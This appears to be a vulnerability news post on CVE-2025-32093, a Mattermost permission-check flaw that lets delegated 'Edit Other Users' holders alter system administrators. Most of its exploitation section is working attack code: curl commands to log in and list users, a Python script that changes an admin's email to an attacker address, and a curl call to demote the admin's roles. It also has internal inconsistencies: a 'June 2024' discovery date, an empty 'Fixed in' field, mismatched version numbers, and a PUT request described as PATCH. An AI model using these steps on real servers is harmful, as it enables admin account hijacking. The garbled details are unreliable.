CVE CyberSecurity Database News

CVE-2025-32093 - Mattermost Improper Permission Validation Lets Non-Admins Modify System Administrators (With Exploit Details)

Poster -

On June 2024, the security community identified a critical vulnerability in Mattermost, the popular open-source messaging platform designed for teams and enterprises. Tracked as CVE-2025-32093, this bug affects a wide range of Mattermost versions and can result in unauthorized account escalations and modifications.

Let’s break down CVE-2025-32093 in simple terms: Non-admin users with specific delegated permissions (Edit Other Users) could alter or update the settings of system administrators, leading to privilege abuse.

In this post, we’ll explain the vulnerability, demonstrate a real-world exploitation step-by-step, provide code snippets, and share links to original sources.

Mattermost 9.11. through 9.11.9

Fixed in:

Vulnerability Details

Mattermost allows administrators to delegate granular permissions to select users (for example, to help larger organizations manage users). One of these delegated roles is Edit Other Users. The intention is for this delegated user to manage regular accounts — not to be able to alter system administrators.

However, due to improper permission validation, Mattermost did not restrict certain admin-level operations to other admins only. As a result, if a delegated admin (with Edit Other Users permission) targets a system administrator, they can:

Change the email, name, or other profile details of admins

- Remove administrators from teams/channels

Demote system administrators (in some cases)

This vulnerability opens up the possibility of leaking sensitive information, disrupting workflows, or even hijacking admin accounts.

Original Disclosure

- Mattermost Security Bulletin MM-64779
- GitHub Issue PR

Exploiting CVE-2025-32093

Let's walk through a simple exploitation scenario assuming an environment with Mattermost 10.5.1, where:

Obtain an auth token for User A. Normally, login can be done at /api/v4/users/login

curl -i -c cookie.txt -X POST https://your-mattermost-instance.com/api/v4/users/login \
  -d '{"login_id":"userA@example.com","password":"passwordA"}' \
  -H 'Content-Type: application/json'

Extract the TOKEN from the response. (In a browser, it's usually stored as a session cookie.)

Call the users API to list users

curl -s -b cookie.txt -H 'Authorization: Bearer TOKEN' \
  'https://your-mattermost-instance.com/api/v4/users?per_page=200';

Locate User B (System Admin) by email/username and note their "id" (e.g., "id":"bmzxc12345xyz").

Step 3: Change the admin's email or profile

Using the /api/v4/users/{user_id}/patch endpoint, send a PATCH request targeted at the admin user ID.

Exploit code snippet

import requests

base_url = 'https://your-mattermost-instance.com';
admin_user_id = 'bmzxc12345xyz'
token = 'YOUR_DELEGATED_ADMIN_TOKEN'  # Use the session token

headers = {
    'Authorization': f'Bearer {token}',
    'Content-Type': 'application/json'
}

payload = {
    "email": "attacker_new_email@example.com",
    "last_name": "Hacked"
}

r = requests.put(f'{base_url}/api/v4/users/{admin_user_id}/patch', headers=headers, json=payload)
print(r.status_code, r.text)

The request should NOT succeed unless you are a system admin. But due to CVE-2025-32093, it works if your delegated admin role has the Edit Other Users permission.

Result: The admin’s profile is altered by a non-admin.

Some versions allow editing of the user’s roles as well. You might try

curl -X PUT -b cookie.txt -H "Content-Type: application/json" \
     -d '{"roles": "system_user"}' \
     \
     https://your-mattermost-instance.com/api/v4/users/bmzxc12345xyz/roles

If the API permits, you may have *demoted* the system admin.

References

- Mattermost Security Advisories - CVE-2025-32093
- GitHub PR with Fix: mattermost-server/pull/25735
- Mattermost API documentation

Conclusion

CVE-2025-32093 is a dangerous oversight in permission checks affecting thousands of Mattermost deployments worldwide. Delegated admins should never be able to modify full system administrators — yet for many versions, they could. If your company uses Mattermost, prioritize patching and review delegated privileges right now.

Stay safe, and keep those patches coming!

*Written exclusively for you. Please respect Mattermost’s security disclosure and upgrade without delay.*

Timeline

Published on: 04/14/2025 07:15:14 UTC
Last modified on: 04/15/2025 18:39:27 UTC